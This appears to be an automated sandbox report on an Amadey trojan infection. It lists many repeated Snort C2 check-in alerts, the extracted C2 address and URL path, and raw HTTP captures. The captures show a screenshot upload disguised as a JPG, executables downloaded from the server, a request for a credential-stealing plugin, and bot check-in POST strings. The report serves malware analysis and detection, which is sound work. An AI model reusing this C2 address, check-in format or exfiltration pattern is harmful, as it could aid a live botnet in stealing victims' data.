                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50235 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50236 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50238 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50239 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50240 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50241 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50243 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50244 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50246 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50247 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50248 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50250 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50251 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50252 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50253 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50255 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50256 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50258 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50259 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50260 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50261 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50263 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50264 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50265 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50266 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50268 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50269 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50271 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50272 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50273 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50274 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50276 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50277 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50278 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50279 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50280 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50281 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50283 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50285 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50287 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50289 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50290 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50292 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50294 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50296 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50297 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50298 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50301 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50302 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50304 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50305 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50307 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50308 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50311 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50312 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50313 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50314 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50316 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50318 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50320 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50321 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50322 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50323 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50326 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50327 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50329 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50330 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50332 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50333 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50335 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50336 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50337 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50339 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50340 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50341 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50342 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50344 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50345 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50347 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50348 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50349 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50350 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50352 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50353 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50354 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50355 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50357 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50358 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50360 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50361 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50362 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50364 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50365 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50366 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50367 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50368 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50370 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50371 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50373 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50374 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50375 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50376 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50378 -> 176.111.174.114:80
                  C2 URLs / IPs found in malware configurationShow sources
                  Source: Malware configuration extractorIPs: http://176.111.174.114/Hnq8vS/index.php
                  Posts data to a JPG file (protocol mismatch)Show sources
                  Source: unknownHTTP traffic detected: POST //Hnq8vS/index.php?scr=up HTTP/1.1Host: 176.111.174.114User-Agent: UploadorContent-Type: multipart/form-data; boundary=152138533219.jpgConnection: Keep-AliveContent-Length: 185550Data Raw: 2d 2d 31 35 32 31 33 38 35 33 33 32 31 39 2e 6a 70 67 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 31 35 32 31 33 38 35 33 33 32 31 39 2e 6a 70 67 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 0d 0a ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 43 00 02 01 01 01 01 01 02 01 01 01 02 02 02 02 02 04 03 02 02 02 02 05 04 04 03 04 06 05 06 06 06 05 06 06 06 07 09 08 06 07 09 07 06 06 08 0b 08 09 0a 0a 0a 0a 0a 06 08 0b 0c 0b 0a 0c 09 0a 0a 0a ff db 00 43 01 02 02 02 02 02 02 05 03 03 05 0a 07 06 07 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a ff c0 00 11 08 04 00 05 00 03 01 22 00 02 11 01 03 11 01 ff c4 00 1f 00 00 01 05 01 01 01 01 01 01 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 08 09 0a 0b ff c4 00 b5 10 00 02 01 03 03 02 04 03 05 05 04 04 00 00 01 7d 01 02 03 00 04 11 05 12 21 31 41 06 13 51 61 07 22 71 14 32 81 91 a1 08 23 42 b1 c1 15 52 d1 f0 24 33 62 72 82 09 0a 16 17 18 19 1a 25 26 27 28 29 2a 34 35 36 37 38 39 3a 43 44 45 46 47 48 49 4a 53 54 55 56 57 58 59 5a 63 64 65 66 67 68 69 6a 73 74 75 76 77 78 79 7a 83 84 85 86 87 88 89 8a 92 93 94 95 96 97 98 99 9a a2 a3 a4 a5 a6 a7 a8 a9 aa b2 b3 b4 b5 b6 b7 b8 b9 ba c2 c3 c4 c5 c6 c7 c8 c9 ca d2 d3 d4 d5 d6 d7 d8 d9 da e1 e2 e3 e4 e5 e6 e7 e8 e9 ea f1 f2 f3 f4 f5 f6 f7 f8 f9 fa ff c4 00 1f 01 00 03 01 01 01 01 01 01 01 01 01 00 00 00 00 00 00 01 02 03 04 05 06 07 08 09 0a 0b ff c4 00 b5 11 00 02 01 02 04 04 03 04 07 05 04 04 00 01 02 77 00 01 02 03 11 04 05 21 31 06 12 41 51 07 61 71 13 22 32 81 08 14 42 91 a1 b1 c1 09 23 33 52 f0 15 62 72 d1 0a 16 24 34 e1 25 f1 17 18 19 1a 26 27 28 29 2a 35 36 37 38 39 3a 43 44 45 46 47 48 49 4a 53 54 55 56 57 58 59 5a 63 64 65 66 67 68 69 6a 73 74 75 76 77 78 79 7a 82 83 84 85 86 87 88 89 8a 92 93 94 95 96 97 98 99 9a a2 a3 a4 a5 a6 a7 a8 a9 aa b2 b3 b4 b5 b6 b7 b8 b9 ba c2 c3 c4 c5 c6 c7 c8 c9 ca d2 d3 d4 d5 d6 d7 d8 d9 da e2 e3 e4 e5 e6 e7 e8 e9 ea f2 f3 f4 f5 f6 f7 f8 f9 fa ff da 00 0c 03 01 00 02 11 03 11 00 3f 00 fc 50 8a 2f 2e 9f 52 fd 8f 77 5c d2 ec 35 fa 5c 69 9f 07 ce 47 1f 7a 75 7b 17 c1 af d8 53 f6 86 f8 d3 e1 3b 2f 89 1a 56 81 65 a2 f8 4f 50 9e 48 ad 3c 51 e2 2b f5 b7 b5 99 a3 72 92 18 91 43 4f 70 15 c1 56 30 c5 26 d2 08 38 22 bd df e1 ff 00 fc 13 93 e0 87 85 f6 5d 7c 4a f1 de b3 e2 bb c5 5c b5 9e 91 12 e9 b6 28 e0 f4 f3 1c 49 35 c4 67 d9 6d 9f e9 58 d5 c4 e1 e9 68 e5 af 91 ac 28 56 a8 ae 96 87 c5 29 f7 6a c2 7d da fd 19 bd fd 87 ff 00 63 8f 1a 78 7f ec 6f f0 5a 7f 0f c8 cd 95 d4 7c 2f e2 7b e5 b8 07 8c 03 f6 e9 2
                  Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 28 Apr 2021 21:22:22 GMTServer: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16Last-Modified: Fri, 23 Apr 2021 10:22:14 GMTETag: "1f200-5c0a12b672180"Accept-Ranges: bytesContent-Length: 127488Content-Type: application/octet-streamData Raw: 4d 5a 50 00 02 00 00 00 04 00 0f 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 ba 10 00 0e 1f b4 09 cd 21 b8 01 4c cd 21 90 90 54 68 69 73 20 70 72 6f 67 72 61 6d 20 6d 75 73 74 20 62 65 20 72 75 6e 20 75 6e 64 65 72 20 57 69 6e 33 32 0d 0a 24 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 19 5e 42 2a 00 00 00 00 00 00 00 00 e0 00 8e a1 0b 01 02 19 00 96 01 00 00 58 00 00 00 00 00 00 84 a4 01 00 00 10 00 00 00 b0 01 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 40 02 00 00 04 00 00 00 00 00 00 02 00 01 00 00 00 00 00 00 00 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 f0 01 00 40 00 00 00 00 e0 01 00 26 0e 00 00 00 20 02 00 00 14 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 02 00 9c 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 43 4f 44 45 00 00 00 00 9c 94 01 00 00 10 00 00 00 96 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 44 41 54 41 00 00 00 00 b4 13 00 00 00 b0 01 00 00 14 00 00 00 9a 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 42 53 53 00 00 00 00 00 dd 09 00 00 00 d0 01 00 00 00 00 00 00 ae 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 2e 69 64 61 74 61 00 00 26 0e 00 00 00 e0 01 00 00 10 00 00 00 ae 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 65 64 61 74 61 00 00 40 00 00 00 00 f0 01 00 00 02 00 00 00 be 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 50 2e 72 65 6c 6f 63 00 00 9c 1d 00 00 00 00 02 00 00 1e 00 00 00 c0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 50 2e 72 73 72 63 00 00 00 00 14 00 00 00 20 02 00 00 14 00 00 00 de 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 40 02 00 00 00 00 00 00 f2 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                  Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 28 Apr 2021 21:22:33 GMTServer: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16Last-Modified: Fri, 23 Apr 2021 10:22:18 GMTETag: "37800-5c0a12ba42a80"Accept-Ranges: bytesContent-Length: 227328Content-Type: application/octet-streamData Raw: 4d 5a 50 00 02 00 00 00 04 00 0f 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 ba 10 00 0e 1f b4 09 cd 21 b8 01 4c cd 21 90 90 54 68 69 73 20 70 72 6f 67 72 61 6d 20 6d 75 73 74 20 62 65 20 72 75 6e 20 75 6e 64 65 72 20 57 69 6e 33 32 0d 0a 24 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 19 5e 42 2a 00 00 00 00 00 00 00 00 e0 00 8e a1 0b 01 02 19 00 0a 03 00 00 6a 00 00 00 00 00 00 30 19 03 00 00 10 00 00 00 20 03 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 d0 03 00 00 04 00 00 00 00 00 00 02 00 01 00 00 00 00 00 00 00 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 70 03 00 3f 00 00 00 00 50 03 00 d0 12 00 00 00 b0 03 00 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 03 00 08 26 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 43 4f 44 45 00 00 00 00 48 09 03 00 00 10 00 00 00 0a 03 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 44 41 54 41 00 00 00 00 60 12 00 00 00 20 03 00 00 14 00 00 00 0e 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 42 53 53 00 00 00 00 00 a5 0a 00 00 00 40 03 00 00 00 00 00 00 22 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 2e 69 64 61 74 61 00 00 d0 12 00 00 00 50 03 00 00 14 00 00 00 22 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 65 64 61 74 61 00 00 3f 00 00 00 00 70 03 00 00 02 00 00 00 36 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 50 2e 72 65 6c 6f 63 00 00 08 26 00 00 00 80 03 00 00 28 00 00 00 38 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 50 2e 72 73 72 63 00 00 00 00 18 00 00 00 b0 03 00 00 18 00 00 00 60 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 03 00 00 00 00 00 00 78 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                  Source: global trafficHTTP traffic detected: GET /Hnq8vS/plugins/cred.dll HTTP/1.1Host: 176.111.174.114
                  Source: global trafficHTTP traffic detected: POST /Hnq8vS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.111.174.114Content-Length: 83Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 39 32 38 31 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=928100&un=user&dm=&av=13&lv=0
                  Source: global trafficHTTP traffic detected: POST /Hnq8vS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.111.174.114Content-Length: 83Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 39 32 38 31 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=928100&un=user&dm=&av=13&lv=0
                  Source: global trafficHTTP traffic detected: POST /Hnq8vS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.111.174.114Content-Length: 83Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 39 32 38 31 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=928100&un=user&dm=&av=13&lv=0
                  Source: global trafficHTTP traffic detected: POST /Hnq8vS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.111.174.114Content-Length: 83Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 39 32 38 31 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=928100&un=user&dm=&av=13&lv=0
                  Source: global trafficHTTP traffic detected: POST /Hnq8vS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.111.174.114Content-Length: 83Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 39 32 38 31 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=928100&un=user&dm=&av=13&lv=0
